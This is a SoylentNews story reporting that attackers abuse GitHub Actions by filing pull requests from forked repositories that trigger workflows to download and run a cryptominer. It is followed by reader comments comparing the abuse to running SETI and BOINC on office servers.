Stories
Slash Boxes
Comments

SoylentNews is people

GitHub Actions Being Actively Abused to Mine Cryptocurrency on GitHub Servers

posted by martyb on Monday April 05 2021, @07:27PM   Printer-friendly
from the abusing-GitHub-for-fun-and-profit dept.

Fnord666 writes:

GitHub Actions being actively abused to mine cryptocurrency on GitHub servers

GitHub Actions is currently being abused by attackers to mine cryptocurrency using GitHub's servers in an automated attack.

GitHub Actions is a CI/CD solution that makes it easy to automate all your software workflows and setup periodic tasks.

The particular attack adds malicious GitHub Actions code to repositories forked from legitimate ones, and further creates a Pull Request for the original repository maintainers to merge the code back, to alter the original code. But, an action is not required by the maintainer of the legitimate project for the attack to succeed.

BleepingComputer also observed the malicious code loads a misnamed crypto miner npm.exe from GitLab and runs it with the attacker's wallet address. Additionally, after initially reporting on this incident, BleepingComputer has come across copycat attacks targeting more GitHub projects in this manner.

Here is how it works:

The attack involves first forking a legitimate repository that has GitHub Actions enabled. It then injects malicious code in the forked version, and files a Pull Request for the original repository maintainers to merge the code back. But, in an unexpected twist, the attack does not need the maintainer of the original project to approve the malicious Pull Request.

Perdok says that merely filing the Pull Request by the malicious attacker is enough to trigger the attack. This is especially true for GitHub projects that have automated workflows setup to validate incoming Pull Requests via Actions. As soon as a Pull Request is created for the original project, GitHub's systems would execute the attacker's code which instructs GitHub servers to retrieve and run a crypto miner.

It looks like the validation of the Pull request is what triggers execution of the cryptominer. I wonder how long Github Actions will run a task before killing it?

Original Submission

 
This discussion has been archived. No new comments can be posted.
GitHub Actions Being Actively Abused to Mine Cryptocurrency on GitHub Servers | Log In/Create an Account | Top | 19 comments | Search Discussion
Display Options Threshold/Breakthrough Mark All as Read Mark All as Unread
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.

  • (Score: 2) by legont on Tuesday April 06 2021, @12:29AM (3 children)

    by legont (4179) on Tuesday April 06 2021, @12:29AM (#1133700)

    I had a few powerful idle servers at the office so I run SETI on them 24x7. Nobody ever asked anything. How does it differ from crypto mining I still wonder.

    --
    "Wealth is the relentless enemy of understanding" - John Kenneth Galbraith.
    Starting Score:    1  point
    Karma-Bonus Modifier   +1  
    Total Score:   2  

  • (Score: 0) by Anonymous Coward on Tuesday April 06 2021, @01:37AM

    by Anonymous Coward on Tuesday April 06 2021, @01:37AM (#1133722)

    You aren't appropriating the resources of others for your own pecuniary benefit.

  • (Score: 2) by Unixnut on Tuesday April 06 2021, @08:53AM (1 child)

    by Unixnut (5779) on Tuesday April 06 2021, @08:53AM (#1133797)

    Well, to be fair even nowadays, running SETI (or BOINC) on office servers is considered bad practice, if not cause for disciplinary action.

    The reasons it could have been done "once upon a time" are primarily:

    1. Computers were not as good at power management as they are now. Whether a server was at 100% or mostly idle didn't result in a massive difference in the power bill or cooling costs, so nobody really noticed.
    2. There was less general awareness on computer technology/security. Back in the 90's and 00's, the local sysadmin was very much "king of the hill" for the computers and servers, and could run things like SETI without the rest of the office knowing. Especially as it also worked as a screensaver.
    3. Security was not such a big deal. Nowadays, if there is a compromise of the office, the company itself can be liable. They have security departments monitoring for things like bittorrent/crypto-miners/SETI/BOINC etc... and shutting them down. A compromise can be blamed on any one of these third party tools, even if they were not at fault, meaning there is a very high risk vs reward for running them on office machines.

    Saying that, SETI/BOINC to my knowledge never had an issue of exploitation, which is impressive, when you consider they work on the pretext of sending binary executables to peoples machines in order to do local processing. Sending one compromised binary to thousands of machines at once must have been a juicy target.

    Crypto-mining in that sense is a bit more secure, as you are not constantly pulling executables off the internet as part of the processing, but rather just calculating hashes that are sent to and fro. Still a risk because the crypto-miner itself needs to be downloaded off the internet itself.

    • (Score: 0) by Anonymous Coward on Wednesday April 07 2021, @02:17AM

      by Anonymous Coward on Wednesday April 07 2021, @02:17AM (#1134144)

      SETI and BOINC are both open source. One reason why attacks on their infrastructure were relatively rare is because people compiled their own versions to squeeze out that little edge. They also routinely compared the result with the distributed version. In addition, most BOINC projects don't actually send the executable along for the ride in work units. "Applications" have their own secondary distribution system that is much more tightly controlled and there is "anonymous platform" support if you don't want to download executables at all.